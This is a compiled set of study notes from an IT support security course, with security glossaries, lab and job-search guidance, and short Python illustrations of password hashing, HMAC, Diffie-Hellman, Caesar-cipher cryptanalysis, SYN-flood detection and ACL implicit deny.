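This is Kerckhoff's principle in miniature: the algorithm is public and only the shift is secret, yet the cipher still fails, because a 26-value key space and a letter distribution that survives substitution leave nothing for the secret to protect. Modern ciphers keep the same assumption (public algorithm, secret key) but with keys that cannot be enumerated and outputs that leak no such statistics.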
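The sample submission's password policy (8 characters, one special character or punctuation, rotation every 12 months) and the glossary's entries for password salt, rainbow tables, deterministic hashing and HMAC all concern how a password or message is checked without trusting the raw value. The following is an added example, not course code: it enforces the three stated rules, stores passwords as salted PBKDF2-HMAC-SHA256 digests, and authenticates a message with HMAC. The 365-day reading of "12 months", the iteration count and the function names are this example's own choices.

```python
"""Password policy, salted password storage and HMAC (added illustration).

Rule values come from the sample submission; the 365-day approximation of
"12 months", the PBKDF2 work factor and all function names are assumptions
made for this example.
"""
import hashlib
import hmac
import os
import string
from datetime import date
from typing import List, Optional

MIN_LENGTH = 8
SPECIAL_CHARS = set(string.punctuation)
MAX_AGE_DAYS = 365          # "changed once every 12 months" (assumption: 365 days)
PBKDF2_ROUNDS = 200_000     # work factor; constructed value for the example


def check_password_policy(password: str, last_changed: date, today: date) -> List[str]:
    """Return the policy rules the password violates; an empty list means it complies."""
    violations = []
    if len(password) < MIN_LENGTH:
        violations.append("shorter than 8 characters")
    if not any(ch in SPECIAL_CHARS for ch in password):
        violations.append("no special character or punctuation")
    if (today - last_changed).days > MAX_AGE_DAYS:
        violations.append("not changed within 12 months")
    return violations


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Store a password as "<salt hex>$<PBKDF2-HMAC-SHA256 hex>".

    The hash is deterministic for a given (password, salt) pair, but the random
    per-user salt makes identical passwords produce different stored values, so a
    precomputed (rainbow) table of unsalted digests cannot be looked up against them.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(digest.hex(), digest_hex)


def make_mac(key: bytes, message: bytes) -> str:
    """HMAC-SHA256 tag: only a holder of `key` can produce or verify it."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_mac(key: bytes, message: bytes, tag: str) -> bool:
    """True only if the message is unmodified and the tag was made with the same key."""
    return hmac.compare_digest(make_mac(key, message), tag)


if __name__ == "__main__":
    print(check_password_policy("short!", date(2024, 1, 1), date(2024, 6, 1)))
    stored = hash_password("G00d-pass!")
    print(stored, verify_password("G00d-pass!", stored))
    tag = make_mac(b"shared-key", b"order 42 total 19.99")
    print(tag, verify_mac(b"shared-key", b"order 42 total 19.99", tag))
```

Two details matter more than they look. `hmac.compare_digest` avoids a comparison whose running time depends on how many leading bytes match, and the salt is stored beside the digest rather than kept secret: its job is uniqueness, not secrecy, which is exactly the distinction the glossary draws between a salt and a key.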

Terms and their definitions from previous weeks


A

Adware: Software that displays advertisements and collects data

Attack: An actual attempt at causing harm to a system

Availability: Means that the information we have is readily accessible to those people that
should have it

Backdoor: A way to get into a system if the other methods to get in a system aren't allowed,
it's a secret entryway for attackers

Baiting: An attack that happens through actual physical contact, enticing a victim to do
something

Botnet: A collection of one or more Bots

Bots: Machines compromised by malware that are utilized to perform tasks centrally
controlled by an attacker

Brute force attacks: A common password attack which consists of just continuously trying
different combinations of characters and letters until one gets access

CIA Triad: Confidentiality, integrity, and availability. Three key principles of a guiding model
for designing information security policies

Confidentiality: Keeping things hidden

Cross-site scripting (XSS): A type of injection attack where the attacker can insert malicious
code and target the user of the service

D
Denial-of-Service (DoS) attack: An attack that tries to prevent access to a service for
legitimate users by overwhelming the network or server

Dictionary attack: A type of password attack that tries out words that are commonly used in
passwords, like password, monkey, football

Distributed Denial-of-Service (DDoS) attack: A DoS attack using multiple systems

DNS Cache Poisoning Attack: It works by tricking a DNS server into accepting a fake DNS
record that will point you to a compromised DNS server

Evil twin: The premise of an evil twin attack is for you to connect to a network that is
identical to yours but that is controlled by an attacker. Once connected to it, they will be able
to monitor your traffic

Exploit: Software that is used to take advantage of a security bug or vulnerability

Hacker: Someone who attempts to break into or exploit a system

Half-open attacks: A way to refer to SYN floods

Injection attacks: A common security exploit that can occur in software development and
runs rampant on the web, where an attacker injects malicious code

Integrity: Means keeping our data accurate and untampered with

Keylogger: A common type of spyware that's used to record every keystroke you make

Logic bomb: A type of Malware that's intentionally installed

Malware: A type of malicious software that can be used to obtain your sensitive information
or delete or modify files

Meddler in the middle (formerly known as Man in the Middle): An attack that places the
attacker in the middle of two hosts that think they're communicating directly with each other

Password attacks: Utilize software like password crackers that try and guess your password

Phishing attack: It usually occurs when a malicious email is sent to a victim disguised as
something legitimate

Ping flood: It sends tons of ping packets to a system. If a computer can't keep up with this,
then it's prone to being overwhelmed and taken down

Ransomware: A type of attack that holds your data or system hostage until you pay some
sort of ransom

Risk: The possibility of suffering a loss in the event of an attack on the system

Rogue Access Point (AP) Attack: An access point that is installed on the network without the
network administrator's knowledge

Rootkit: A collection of software or tools that gives an attacker privileged ("root" or
administrator) access to a system while hiding its own presence, for example by altering the
OS so that its files and processes don't show up

Screen lock: A security feature that helps prevent unwanted access by creating an action you
have to do to gain entry

Session hijacking (cookie hijacking): A common meddler in the middle attack in which the
attacker steals a user's session token (typically a cookie) and reuses it to impersonate that
user without ever needing their password

Social engineering: An attack method that relies heavily on interactions with humans instead
of computers

Spear phishing: Phishing that targets individual or group - the fake emails may contain some
personal information like your name, or the names of friends or family

Spoofing: When a source is masquerading around as something else

Spyware: The type of malware that's meant to spy on you

SQL Injection Attack: An injection attack against a website backed by a SQL database:
untrusted input is spliced into a SQL query, letting the attacker read, modify or delete data
across the whole database rather than just their own records

SYN flood: A DoS attack in which the server is bombarded with TCP SYN packets whose
handshakes are never completed, exhausting its capacity to accept new connections

Tailgating: Gaining access into a restricted area or building by following a real employee in

Threat: The possibility of danger that could exploit a vulnerability

Trojan: Malware that disguises itself as one thing but does something else

Viruses: The best known type of malware; a virus attaches itself to another program or file
and spreads when that host is run or opened

Vulnerability: A flaw in the system that could be exploited to compromise the system

Worms: They are similar to viruses except that instead of having to attach themselves onto
something to spread, worms can live on their own and spread through channels like the
network

0-Day Vulnerability (Zero Day): A vulnerability that is not known to the software developer
or vendor, but is known to an attacker

Qwiklabs Introduction
For some of your graded assessments, you’ll use the Qwiklabs tool to complete the assigned
activities. Qwiklabs is an online lab tool that creates simulated Windows and Linux OS
environments. With this tool, you can complete the course activities without having to install
extra software on your computer. 

Important details
Qwiklabs allows you to use both Linux and Windows operating systems as if they were
installed on your local machine. When you access your Qwiklabs activities through Coursera
you will be given the software and OS setup needed to complete the activity within the tool.

Make sure to always access labs directly through Coursera (not through the Qwiklabs
catalog). If you do not access labs directly through Coursera, you will not receive a grade. 

Here are some things to be ready for when using Qwiklabs:

- Unless stated otherwise, you will have 60 minutes to complete each Qwiklabs assignment.
- You'll experience a delay as the labs load. Also expect delays when the Linux and Windows
  simulated environments boot up.
- Each lab connects you to a new Qwiklabs simulated environment. Each time, temporary
  credentials are created for you to connect to the lab. These credentials expire at the end of
  the lab assignment.
- Click "Start Lab" to begin your assessment activity.
- Click "End Lab" to end the activity.
  - The lab needs to run for at least 5 minutes for your activity's score to be shared back to
    Coursera. If you click the "End Lab" button before 5 minutes pass, your score may be
    recorded incorrectly in Coursera.
  - Your grade is calculated when the lab is complete. Be sure to click the "End Lab" button
    when you've finished the assignment.
  - After you end the lab, you won't be able to access your previous work.
- If you receive an error message while completing a lab, please reach out to the Qwiklabs
  support team through the chat support option in the lab's 'help' menu.

Resource
Contact Qwiklabs Support

You want to make sure that your resume is up to date and you want to make sure there are no
typos on that resume. Tweak your resume and adjust it to where everything you have on your
resume seems like it's more IT oriented, because almost every job has an IT aspect. One of the
many ways the Google IT Support Certificate program prepared you: there was a section of
mock interviews, how to conduct yourself during an interview, and that was very helpful.
That's one of the greatest confidence boosters for anyone with any skill. Make sure that you
are asking questions. Don't just sit there and nod your head. Write down questions that you've
been asked that you felt that you didn't have good enough answers for. Go over those
questions. Practice school questions, write those answers out. The more you prepare for it, the
more confident you can be, and sometimes you've got to fake it to make it, and if you can
prepare yourself and psych yourself into saying, you know what, I've got this, I know what I'm
doing, that confidence is going to show off. You have to want it. The same motivation and
drive that got you through the course is the same motivation and drive that you should use in
your job search.

How to Add Google IT Support Certificate to Your Resume and LinkedIn Profile
Congratulations on earning your Google IT Support Professional Certificate! Now it’s time to
let the world know about your new certificate and the skills you gained to help advance your
career. 

Below is a comprehensive list of skills that the Google IT Support Professional Certificate was
designed to develop, along with advice for adding them to your resume and LinkedIn profile.

GOOGLE IT SUPPORT PROFESSIONAL CERTIFICATE SKILLS LIST

- Basic computer architecture
- Operating systems (Windows, Linux)
- Remote connection and virtual machines
- Computer networking
- Software management
- Troubleshooting
- Customer service
- Routing concepts
- VPNs and proxies
- Permissioning
- Package and software management
- Process management
- Resource monitoring
- Systems administration
- Configuration
- Centralized management
- Implementing/managing directory services
- Data management and recovery
- IT security
- Cryptology/encryption
- Hashing
- Network security

ADDING GOOGLE IT SUPPORT CERTIFICATE TO YOUR RESUME

If you’d like to build your resume from scratch, make sure to scroll down to the bottom of this
page to download PDFs of resume templates to help you get started. Keep in mind, these are
just sample resumes, and you should customize them as you see fit!

To add the Google IT Support Professional Certificate to your current resume, you can follow
the steps below.

- List the certificate under the Education section of your resume. Example:

- Add the most relevant skills to the Skills/Proficiencies section of your resume. To identify
  what's most relevant, focus on your strongest skills, and the ones that are most prevalent in
  the job descriptions for the roles you're applying to. Example:

- If the Google IT Support Professional Certificate is your primary qualification for the roles
  you're applying for, you can include information about it in the Summary section of your
  resume. Example:

LINKEDIN

- List the certificate under the Licenses & Certifications section of your LinkedIn Profile.
  Example:

- Describe your Google IT training in the Summary (About) section of your LinkedIn profile. It's
  helpful to frame this credential in the context of your career if you have previous
  experience. Learn more about writing an engaging LinkedIn summary. Example:

- You can list your skills under the Skills section of your LinkedIn profile and collect
  endorsements from your network. Example:

- Consider including the certificate in your LinkedIn headline. Example:

Common Job Search Terms


Keywords to start your online job search

Searching for jobs is all about casting a wide net. We recommend that you spend time on
common job sites like Indeed, Glassdoor, and Google for Jobs, using common job search
terms to help you find IT support roles. (See example searches on these sites below.) Here are
some search terms to get you started:

- Technical Support Specialist
- IT Help Desk
- Help Desk
- IT Technician
- IT Support Specialist
- Computer User Specialist
- IT Helpdesk Technician
- Computer Support
- Technical Support Specialist, Level 1
- IT Assistant

Now, try plugging them into job sites: 
Indeed: www.indeed.com 

Glassdoor: www.glassdoor.com 

Google for jobs 


Module 6 Glossary
New terms and their definitions: Course 5 Week 6
Data exfiltration: The unauthorized transfer of data from a computer. It's also a very
important concern when a security incident happens

Data handling policies: Should cover how different types of data are classified (for example
confidential, internal, public) and how each class must be handled, stored and disposed of

Entry point: The path the attacker used to get in, or the vulnerability the malware exploited.
Determining the entry point is one of the first steps in investigating an incident, because it has
to be closed before recovery or the attacker simply comes back the same way

High value data: usually includes account information, like usernames and passwords.
Typically, any kind of user data is considered high value, especially if payment processing is
involved

Impact: What an incident cost the organization: direct costs such as data lost, systems down
and staff time spent on recovery, and indirect costs such as reputation damage and lost
customer trust

PCI DSS: Payment Card Industry Data Security Standard

Penetration testing: The practice of attempting to break into a system or network, with
permission, to verify that the defenses in place actually work and to find gaps before an
attacker does

Principle of least privilege: Users, processes and services are given only the access they need
to do their job and nothing more. It helps to ensure that sensitive data is only accessed by
people who are authorized to access it

Privacy policies: Govern how sensitive data, especially personal data, may be accessed and used

Recoverability: How complicated and time-consuming the recovery effort will be


Screen lock: A security feature that helps prevent unwanted access by creating an action you
have to do to gain entry

Security: It's all about determining risks or exposure, understanding the likelihood of attacks,
and designing defenses around these risks to minimize the impact of an attack

Severity: Includes factors like what and how many systems were compromised and how the
breach affects business functions

Threats & password policies: Protects Data & IP, Data Protection, Infrastructure Defense,
Identity Management, and users

Vendor risk review: Questionnaire that covers different aspects of their security policies
procedures and defenses

Vulnerability scanner: A tool that probes systems and detects lots of things, ranging from
misconfigured services that represent potential risks to the presence of back doors on systems

Terms and their definitions from previous weeks


Access Control Entries: The individual access permissions per object that make up the ACL

Access Control List (ACL): It is a way of defining permissions or authorizations for objects

Accounting: Keeping records of what resources and services your users access or what they
did when they were using your systems

Activation threshold: Triggers a pre-configured action when it is reached and will typically
block the identified attack traffic for a specific amount of time

Advanced Encryption Standard (AES): The first and only public cipher that's approved for
use with top secret information by the United States National Security Agency

Adware: Software that displays advertisements and collects data

Analyzing logs: The practice of collecting logs from different network and sometimes client
devices on your network, then performing an automated analysis on them

Antivirus software: It monitors and analyzes things like new files being created or modified
on the system in order to watch for any behavior that matches a known malware signature

Application policies: Define boundaries of what applications are permitted or not, but they
also help educate folks on how to use software more securely

Asymmetric encryption: Systems where different keys are used to encrypt and decrypt

Attack surface: It's the sum of all the different attack vectors in a given system

Attack vector: Method or mechanism by which an attacker or malware gains access to a
network or system

Attack: An actual attempt at causing harm to a system

Auditing: It involves reviewing records to ensure that nothing is out of the ordinary

Authentication server (AS): In Kerberos, the server that authenticates the user. The initial
request to it includes the user ID of the authenticating user, and its reply carries the
ticket-granting ticket

Authentication: Proving that you are who you claim to be, for example with a password, a
token or a biometric. Cryptographic hash functions are a crucial building block for it

Authorization: It pertains to describing what the user account has access to or doesn't have
access to

Availability: Means that the information we have is readily accessible to those people that
should have it

Backdoor: A way to get into a system if the other methods to get in a system aren't allowed,
it's a secret entryway for attackers

Baiting: An attack that happens through actual physical contact, enticing a victim to do
something

Bastion hosts or networks: A server used to provide access to a private network from an
external network

Binary whitelisting software: It's a list of known good and trusted software and only things
that are on the list are permitted to run

Bind: The LDAP operation by which clients authenticate to the directory server

Biometric authentication: Authentication that uses Biometric data

Block ciphers: The cipher takes data in, places that into a bucket or block of data that's a
fixed size, then encodes that entire block as one unit

Botnet: A collection of one or more Bots


Bots: Machines compromised by malware that are utilized to perform tasks centrally
controlled by an attacker

Brute force attacks: A common password attack which consists of just continuously trying
different combinations of characters and letters until one gets access

CA (Certificate authority): It's the entity that's responsible for storing, issuing, and signing
certificates. It's a crucial component of the PKI system

Caesar cipher: A substitution alphabet, where you replace characters in the alphabet with
others usually by shifting or rotating the alphabet, a set of numbers or characters

CBC-MAC (Cipher block chaining message authentication codes): A mechanism for building
MACs using block ciphers

CCMP (counter mode CBC-MAC protocol): A mode of operation for block ciphers that
allows for authenticated encryption

Central repository: It is needed to securely store and index keys and a certificate
management system of some sort makes managing access to storage certificates and
issuance of certificates easier

Certificate fingerprints: These are just hash digests of the whole certificate, and aren't
actually fields in the certificate itself, but are computed by clients when validating or
inspecting certificates

Certificate Revocation List (CRL): A means to distribute a list of certificates that are no
longer valid

Certificate Signature Algorithm: This field indicates what public key algorithm is used for
the public key and what hashing algorithm is used to sign the certificate

Certificate Signature Value: The digital signature data itself

Certificate-based authentication: It is the most secure option, but it requires more support
and management overhead since every client must have a certificate

CIA Triad: Confidentiality, integrity, and availability. Three key principles of a guiding model
for designing information security policies

Client certificates: They operate very similarly to server certificates but are presented by
clients and allow servers to authenticate and verify clients

CMACs (Cipher-based Message Authentication Codes): The process is similar to HMAC, but
instead of using a hashing function to produce a digest, a symmetric cipher with a shared key
is used to encrypt the message and the resulting output is used as the MAC

Code signing certificates: Used for signing executable programs; they allow users of these
signed applications to verify the signatures and ensure that the application was not tampered
with

Confidentiality: Keeping things hidden

Correlation analysis: The process of taking log data from different systems, and matching
events across the systems

Counter-based tokens: They use a secret seed value along with the secret counter value
that's incremented every time a one-time password is generated on the device

Cross-site scripting (XSS): A type of injection attack where the attacker can insert malicious
code and target the user of the service

Cryptanalysis: Looking for hidden messages or trying to decipher coded messages without
having the key

Cryptographic hashing: It is distinctly different from encryption because cryptographic hash
functions should be one directional

Cryptography: The overarching discipline that covers the practice of coding and hiding
messages from third parties

Cryptology: The study of cryptography and cryptanalysis together

Cryptosystem: A collection of algorithms for key generation and encryption and decryption
operations that comprise a cryptographic service

Data binding and sealing: It involves using the secret key to derive a unique key that's then
used for encryption of data

Data information tree: A structure where objects will have one parent and can have one or
more children that belong to the parent object

Decryption: The reverse process from encryption; taking the garbled output and
transforming it back into the readable plain text

Defense in depth: The concept of having multiple overlapping systems of defense to protect
IT systems

Denial-of-Service (DoS) attack: An attack that tries to prevent access to a service for
legitimate users by overwhelming the network or server

DES (Data Encryption Standard): One of the earliest encryption standards

Deterministic: It means that the same input value should always return the same hash value

DH (Diffie-Hellman): A popular key exchange algorithm, named for its co-inventors

Dictionary attack: A type of password attack that tries out words that are commonly used in
passwords, like password, monkey, football

Distinguished name (DN): A unique identifier for each entry in the directory

Distributed Denial-of-Service (DDoS) attack: A DoS attack using multiple systems

DNS Cache Poisoning Attack: It works by tricking a DNS server (or resolver) into caching a
forged DNS record, so that anyone who asks it for that name is sent to a host the attacker
controls instead of the real one

DSA (Digital Signature Algorithm): It is another example of an asymmetric cryptographic
system, though it's used for signing and verifying data rather than for encryption

Dynamic ARP inspection (DAI): A feature on enterprise switches that prevents certain types
of attacks

EAP-TLS: One of the more common and secure EAP methods

ECDH & ECDSA: Elliptic curve variants of Diffie-Hellman and DSA, respectively

Elliptic curve cryptography (ECC): A public key encryption system that uses the algebraic
structure of elliptic curves over finite fields to generate secure keys

Encapsulating security payload: It's a part of the IPsec suite of protocols, which
encapsulates IP packets, providing confidentiality, integrity, and authentication of the
packets

Encryption: The act of taking a message (plaintext), and applying an operation to it (cipher),
so that you receive a garbled, unreadable message as the output (ciphertext)

Encryption algorithm: The underlying logic or process that's used to convert the plaintext
into ciphertext

End-entity (leaf certificate): A certificate that has no authority as a CA

Entropy pool: A source of random data to help seed random number generators

Evil twin: An attack in which the attacker sets up a wireless network that looks identical to a
legitimate one (same network name) but is under their control. Once you connect to it, they
are able to monitor and tamper with your traffic

Exploit: Software that is used to take advantage of a security bug or vulnerability

Extensible Authentication Protocol (EAP): A standard authentication framework used by
802.1X; EAP over LAN (EAPOL) is the encapsulation that carries EAP messages directly over a
wired or wireless LAN

Fail2ban: A common open source flood guard tool that watches logs for repeated failures
(such as SSH login attempts) and temporarily bans the offending source address

File-based encryption: Guarantees confidentiality and integrity of files protected by
encryption

FIPS (Federal Information Processing Standards): Standards published by the US government
for federal computer systems; DES was adopted as a FIPS standard for encrypting and
securing government data

Flood guards: Provide protection against DoS or Denial of Service Attacks

Forward secrecy: This is a property of a cryptographic system so that even in the event that
the private key is compromised, the session keys are still safe
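The exchange behind the DH, forward secrecy and session key entries above, as an added example that is not part of the course material. It runs Diffie-Hellman with ephemeral keys, derives a session key from the agreed value, and shows why an unauthenticated exchange falls to a meddler in the middle. The modulus is a toy (2^127 - 1, a known Mersenne prime) chosen so the arithmetic is readable; real deployments use 2048-bit or larger groups, or elliptic curves, and authenticate the public values (for example with certificates).

```python
"""Added example: Diffie-Hellman, forward secrecy and the meddler-in-the-middle problem.
Standard library only. P and G are toy parameters for readability, NOT for production."""
import hashlib
import secrets

P = 2**127 - 1   # toy modulus (Mersenne prime), far too small for real use
G = 3            # toy generator


def keypair():
    """Ephemeral private exponent x and public value g^x mod p."""
    x = secrets.randbelow(P - 2) + 1
    return x, pow(G, x, P)


def shared_secret(my_private: int, their_public: int) -> int:
    """(g^y)^x mod p == (g^x)^y mod p, so both sides compute the same number."""
    return pow(their_public, my_private, P)


def session_key(secret: int) -> bytes:
    """Never use the raw agreed number as a key; hash it into a fixed-size symmetric key."""
    return hashlib.sha256(secret.to_bytes(16, "big")).digest()


def honest_exchange():
    """Alice and Bob exchange public values directly; both derive the same session key.
    Because the private exponents are generated fresh and then discarded, a later compromise
    of either party's long-term credentials reveals nothing about this session (forward secrecy)."""
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    k_alice = session_key(shared_secret(a_priv, b_pub))
    k_bob = session_key(shared_secret(b_priv, a_pub))
    return k_alice, k_bob


def meddler_exchange():
    """Mallory intercepts both public values and substitutes her own. Alice and Bob each end
    up sharing a key with Mallory, not with each other, and she can decrypt and re-encrypt
    every message. This is why DH must be paired with authentication of the public values."""
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    m_priv, m_pub = keypair()
    k_alice = session_key(shared_secret(a_priv, m_pub))      # Alice believes m_pub is Bob's
    k_bob = session_key(shared_secret(b_priv, m_pub))        # Bob believes m_pub is Alice's
    k_mallory_with_alice = session_key(shared_secret(m_priv, a_pub))
    k_mallory_with_bob = session_key(shared_secret(m_priv, b_pub))
    return k_alice, k_bob, k_mallory_with_alice, k_mallory_with_bob


if __name__ == "__main__":
    ka, kb = honest_exchange()
    print("honest exchange, keys match:", ka == kb)
    print("second run gives a different key:", honest_exchange()[0] != ka)
    ka, kb, kma, kmb = meddler_exchange()
    print("meddler: Alice<->Mallory match:", ka == kma, " Bob<->Mallory match:", kb == kmb,
          " Alice<->Bob match:", ka == kb)
```

The two `meddler_exchange` results are the whole point: without something that binds a public value to an identity, the protocol gives no way for Alice to tell Mallory's value from Bob's.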

Four-Way Handshake: It is designed to allow an AP to confirm that the client has the correct
pairwise master key in a WPA-PSK setup without disclosing the PMK

Frequency analysis: The practice of studying the frequency with which letters appear in
ciphertext
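The Caesar cipher and frequency analysis entries describe an attack that is easy to carry out; the code below is an added example (not from the course) that encrypts with a rotation, then recovers the key by comparing the ciphertext's letter distribution against published English letter frequencies with a chi-squared score. The sample sentence is constructed for the demonstration.

```python
"""Added example: Caesar (rotation) cipher and breaking it with frequency analysis.
Standard library only; ENGLISH_FREQ holds the commonly published letter frequencies."""
import string

ALPHABET = string.ascii_uppercase

# Relative frequency (percent) of each letter in English text, A..Z.
ENGLISH_FREQ = [
    8.17, 1.49, 2.78, 4.25, 12.70, 2.23, 2.02, 6.09, 6.97, 0.15, 0.77, 4.03, 2.41,
    6.75, 7.51, 1.93, 0.10, 5.99, 6.33, 9.06, 2.76, 0.98, 2.36, 0.15, 1.97, 0.07,
]

# Constructed plaintext; ordinary English prose of this length is plenty for the attack.
SAMPLE_TEXT = ("it was the best of times it was the worst of times it was the age of wisdom "
               "it was the age of foolishness it was the epoch of belief it was the epoch of incredulity")


def caesar(text: str, shift: int) -> str:
    """Rotate every letter by `shift` positions (negative to decrypt); other characters pass through."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def letter_counts(text: str):
    counts = [0] * 26
    for ch in text.upper():
        if ch in ALPHABET:
            counts[ord(ch) - ord("A")] += 1
    return counts


def chi_squared(counts, shift: int) -> float:
    """Distance between the ciphertext letter distribution, undone by `shift`, and English.
    Ciphertext letter (i + shift) decrypts to plaintext letter i, so compare those counts."""
    total = sum(counts) or 1
    score = 0.0
    for i in range(26):
        observed = counts[(i + shift) % 26]
        expected = ENGLISH_FREQ[i] / 100 * total
        score += (observed - expected) ** 2 / expected
    return score


def break_caesar(ciphertext: str) -> int:
    """Try all 26 keys and return the one whose decryption looks most like English."""
    counts = letter_counts(ciphertext)
    return min(range(26), key=lambda k: chi_squared(counts, k))


if __name__ == "__main__":
    ct = caesar(SAMPLE_TEXT, 13)
    key = break_caesar(ct)
    print(ct)
    print("recovered key:", key)
    print(caesar(ct, -key))
```

The attack works because a substitution cipher preserves letter frequencies; the same weakness is why modern ciphers are designed so ciphertext is indistinguishable from random data.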

Full disk encryption (FDE): It is the practice of encrypting the entire drive in the system

GTK (Group Temporal Key): A temporal key used to encrypt broadcast and multicast traffic
sent by the AP to all clients; each client's unicast traffic uses its own PTK instead

Hacker: Someone who attempts to break into or exploit a system

Half-open attacks: Another name for SYN floods: each spoofed SYN leaves a TCP connection
half-open (SYN received, handshake never completed) until the server's connection table fills up
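A tiny flood guard, as an added example that is not part of the course, tying together the activation threshold, flood guards, half-open attacks and SYN flood entries. It parses a snapshot of the TCP socket table in the column layout of `ss -tan` (the lines themselves are constructed for the example), counts half-open (SYN-RECV) connections per remote address, and reports the sources that reach the threshold. A real guard would read live kernel state and act on the result.

```python
"""Added example: counting half-open TCP connections per peer and applying an activation
threshold. The socket table below is constructed (ss -tan column layout); standard library only."""
from collections import Counter

# Constructed snapshot. 10.0.0.5 is a normal client with one connection still completing;
# 203.0.113.9 (an RFC 5737 documentation address) is sending SYNs it never finishes.
SAMPLE_SS_OUTPUT = """\
State      Recv-Q Send-Q Local Address:Port  Peer Address:Port
ESTAB      0      0      192.0.2.10:443      10.0.0.5:51000
SYN-RECV   0      0      192.0.2.10:443      10.0.0.5:51001
SYN-RECV   0      0      192.0.2.10:443      203.0.113.9:40001
SYN-RECV   0      0      192.0.2.10:443      203.0.113.9:40002
SYN-RECV   0      0      192.0.2.10:443      203.0.113.9:40003
SYN-RECV   0      0      192.0.2.10:443      203.0.113.9:40004
SYN-RECV   0      0      192.0.2.10:443      203.0.113.9:40005
LISTEN     0      128    0.0.0.0:22          0.0.0.0:*
"""


def half_open_by_peer(ss_output: str) -> Counter:
    """Count SYN-RECV sockets per remote IP (port stripped)."""
    counts = Counter()
    for line in ss_output.splitlines()[1:]:          # first line is the column header
        fields = line.split()
        if len(fields) < 5 or fields[0] != "SYN-RECV":
            continue
        # Peer column is ip:port; rsplit keeps this correct for IPv4. Bracketed IPv6
        # addresses ([2001:db8::1]:443) would need the brackets stripped as well.
        peer_ip = fields[4].rsplit(":", 1)[0]
        counts[peer_ip] += 1
    return counts


def flood_sources(ss_output: str, threshold: int):
    """Peers whose half-open count reaches the activation threshold, busiest first.
    This is the list a flood guard would hand to the firewall for a temporary block."""
    counts = half_open_by_peer(ss_output)
    return [ip for ip, n in counts.most_common() if n >= threshold]


if __name__ == "__main__":
    for ip, n in half_open_by_peer(SAMPLE_SS_OUTPUT).items():
        print(f"{ip}: {n} half-open")
    print("block:", flood_sources(SAMPLE_SS_OUTPUT, threshold=5))
```

Blocking by source only helps when the SYNs carry a real address; against spoofed sources the kernel-side defence is SYN cookies, which let the server avoid allocating state until the handshake completes.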


Hash collisions: Two different inputs mapping to the same output

Hashing (Hash function): A type of function or operation that takes in an arbitrary data input
and maps it to an output of a fixed size, called a hash or a digest

HMAC (Keyed-Hash Message Authentication Codes): It uses a cryptographic hash function
along with a secret key to generate a MAC

Host-based firewalls: Protects individual hosts from being compromised when they're used
in untrusted and potentially malicious environments

HTTPS: Hypertext Transfer Protocol Secure is a secure version of HTTP that ensures the
communication your web browser has with the website is secured through encryption

Hubs: Devices that serve as a central location through which data travels through; a quick
and dirty way of getting packets mirrored to your capture interface

Identification: The idea of describing an entity uniquely

Implicit deny: A network security concept where anything not explicitly permitted or allowed
should be denied
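Implicit deny, access control lists and access control entries fit together in a few lines of code; the block below is an added example (not from the course) that evaluates an ordered ACL where the first matching entry wins and a packet that matches no entry is denied. The rules and test packets are constructed for the example.

```python
"""Added example: an ordered ACL with first-match semantics and implicit deny.
Rules and packets are constructed; standard library only."""
import ipaddress
from typing import NamedTuple, Optional, Tuple


class ACE(NamedTuple):
    """One access control entry."""
    action: str              # "permit" or "deny"
    source: str              # CIDR, or "any"
    dst_port: Optional[int]  # None matches every port
    comment: str = ""


# Constructed list: SSH only from the admin subnet, web from anywhere, one host quarantined.
# Order matters: the quarantine entry sits above the permit so it wins for that host.
ACL = [
    ACE("deny",   "10.0.5.66/32", None, "compromised workstation, quarantined"),
    ACE("permit", "10.0.5.0/24",  22,   "admin subnet -> SSH"),
    ACE("permit", "any",          443,  "public HTTPS"),
    ACE("permit", "any",          80,   "public HTTP (redirects to 443)"),
    # No catch-all entry on purpose: anything that reaches the end is implicitly denied.
]


def evaluate(acl, src_ip: str, dst_port: int) -> Tuple[str, Optional[ACE]]:
    """Return (decision, matching ACE). (\"deny\", None) means no entry matched: implicit deny."""
    ip = ipaddress.ip_address(src_ip)
    for ace in acl:
        net = ipaddress.ip_network("0.0.0.0/0" if ace.source == "any" else ace.source)
        if ip in net and (ace.dst_port is None or ace.dst_port == dst_port):
            return ace.action, ace
    return "deny", None


if __name__ == "__main__":
    probes = [("10.0.5.10", 22), ("10.0.5.66", 22), ("203.0.113.4", 443),
              ("203.0.113.4", 22), ("10.0.5.10", 3389)]
    for src, port in probes:
        decision, ace = evaluate(ACL, src, port)
        why = ace.comment if ace else "implicit deny (no matching entry)"
        print(f"{src}:{port} -> {decision} ({why})")
```

The last two probes are the point of implicit deny: RDP from the admin subnet and SSH from the internet were never mentioned in the list, and they are refused without anyone having to anticipate them.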

Injection attacks: A common security exploit that can occur in software development and
runs rampant on the web, where an attacker injects malicious code

Integrity: Means keeping our data accurate and untampered with

Intermediary (subordinate) CA: It means that the entity that this certificate was issued to
can now sign other certificates

Intrusion detection and intrusion prevention systems (IDS/IPS): Operate by monitoring
network traffic and analyzing it for signs of attack; an IDS alerts on what it sees, while an IPS
can also block the traffic

IP source guard (IPSG): It can be enabled on enterprise switches along with DHCP snooping

IPsec (Internet Protocol security): A VPN protocol that was designed in conjunction with
IPv6

Issuer Name: This field contains information about the authority that signed the certificate

Kerberos: A network authentication protocol that uses tickets to allow entities to prove their
identity over potentially insecure channels to provide mutual authentication

Kerckhoff's principle: A principle that states that a cryptosystem, or a collection of
algorithms for key generation and encryption and decryption operations that comprise a
cryptographic service should remain secure, even if everything about the system is known
except for the key

Key escrow: Allows encryption key to be securely stored for later retrieval by an authorized
party

Key length: It defines the maximum potential strength of the system

Key signing parties: Organized by people who are interested in establishing a web of trust,
and participants perform the same verification and signing

Key size: It is the total number of bits or data that comprises the encryption key

Key: A crucial component of a cipher, which introduces something unique into your cipher

